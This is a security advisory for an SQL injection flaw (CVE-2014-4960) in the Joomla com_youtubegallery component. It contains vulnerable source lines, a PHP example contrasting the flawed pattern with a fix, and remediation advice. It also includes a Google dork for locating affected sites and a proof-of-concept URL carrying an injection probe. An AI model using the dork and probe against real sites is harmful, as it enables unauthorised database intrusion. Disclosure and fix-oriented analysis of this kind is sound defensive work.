Vendor: Joomla component com_youtubegallery
By: Pham Van Khanh
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89 (SQL Injection)
Product Name: Joomla component com_youtubegallery
Affected Version From: 4.x
Affected Version To: 3.x (possibly)
Patch Exists: NO
Related CVE: CVE-2014-4960
CPE: a:joomla:com_youtubegallery
Platforms Tested: Joomla 1.5, 2.5, 3
Year: 2014

Joomla component com_youtubegallery – SQL Injection vulnerability

The Joomla component com_youtubegallery is vulnerable to SQL injection. The flaw is in the component's 'gallery.php' model file: the 'listid' and 'themeid' request parameters are not sanitized before being concatenated into an SQL query, so an attacker can inject SQL through them.

Mitigation:

The vendor should sanitize (or cast to integer and bind) user input before using it in SQL queries. Users are advised to update to the latest version of the software.

Exploit-DB raw data:

# Exploit Title: Joomla component com_youtubegallery - SQL Injection vulnerability
# Google Dork: inurl:index.php?option=com_youtubegallery
# Date: 15-07-2014
# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com)
# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery
# Software Link: http://www.joomlaboat.com/youtube-gallery
# Version: 4.x ( 3.x maybe)
# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3
# CVE : CVE-2014-4960

Detail:
At line 40 of components\com_youtubegallery\models\gallery.php, if the listid parameter is an integer (or can be cast to one), $listid and $themeid are read again with getVar and are not sanitized.
Source code:
40: if(JRequest::getInt('listid'))
41: {
42:     //Shadow Box
43:     $listid=JRequest::getVar('listid');
44:
45:
46:     //Get Theme
47:     $m_themeid=(int)JRequest::getVar('mobilethemeid');
48:     if($m_themeid!=0)
49:     {
50:         if(YouTubeGalleryMisc::check_user_agent('mobile'))
51:             $themeid=$m_themeid;
52:         else
53:             $themeid=JRequest::getVar('themeid');
54:     }
55:     else
56:         $themeid=JRequest::getVar('themeid');
57: }
Later, $themeid and $listid are used at lines 86 and 92. The two methods getVideoListTableRow and getThemeTableRow concatenate these strings to build the SQL query, so the component is vulnerable to SQL injection.
Source code:
86: if(!$this->misc->getVideoListTableRow($listid))
87: {
88:     echo '<p>No video found</p>';
89:     return false;
90: }
91:
92: if(!$this->misc->getThemeTableRow($themeid))
93: {
94:     echo '<p>No video found</p>';
95:     return false;
96: }

# Site PoC: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700
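The root cause described above is a validate-then-use-raw mismatch: JRequest::getInt('listid') tests the integer cast of the parameter, but the value that reaches the query comes from JRequest::getVar, which returns the raw string. The following PHP is an added illustration, not code from the advisory or from the com_youtubegallery component; it models that mismatch with simplified stand-ins for the two JRequest calls (request_get_int and request_get_var, which read from a supplied array rather than the real request) and a placeholder table name, and places the vulnerable pattern beside a hardened one that uses only the integer the guard already produced.

```php
<?php
// Added illustration, not code from the advisory or from the component.
// Simplified stand-ins for JRequest::getInt / JRequest::getVar (assumed;
// the real Joomla methods read the merged request, these read an array).
function request_get_int(array $req, string $name): int
{
    return isset($req[$name]) ? (int) $req[$name] : 0;
}

function request_get_var(array $req, string $name): string
{
    return isset($req[$name]) ? (string) $req[$name] : '';
}

// Vulnerable pattern: mirrors gallery.php lines 40-43 plus the string
// concatenation the advisory attributes to getVideoListTableRow (whose body
// it does not show). Table name is a placeholder, not the component's.
function build_query_vulnerable(array $req): ?string
{
    if (request_get_int($req, 'listid')) {          // (int)"1'" === 1, so the guard passes
        $listid = request_get_var($req, 'listid');  // raw value, never sanitized
        return "SELECT * FROM #__placeholder_videolist WHERE id=" . $listid;
    }
    return null;
}

// Hardened pattern: the value that reaches the query is the integer the
// guard produced, so attacker-controlled characters cannot reach the SQL.
function build_query_hardened(array $req): ?string
{
    $listid = request_get_int($req, 'listid');
    if ($listid <= 0) {
        return null;
    }
    return "SELECT * FROM #__placeholder_videolist WHERE id=" . $listid;
}

// Constructed input: the same probe value the advisory's PoC URL sends.
$req = ['listid' => "1'"];

echo build_query_vulnerable($req), PHP_EOL; // ...WHERE id=1'  (quote reaches SQL)
echo build_query_hardened($req), PHP_EOL;   // ...WHERE id=1   (integer only)
```

In a real Joomla model the equivalent fix is to keep the integer returned by JRequest::getInt (or, on Joomla 2.5 and later, JFactory::getApplication()->input->getInt('listid')) for every later use of the id, and to pass any genuinely string-typed parameter through the database driver's quote() method instead of concatenating it. Code review for this class of bug is mechanical: wherever a getInt check is followed by a getVar read of the same parameter name, the check is not protecting the value that is actually used.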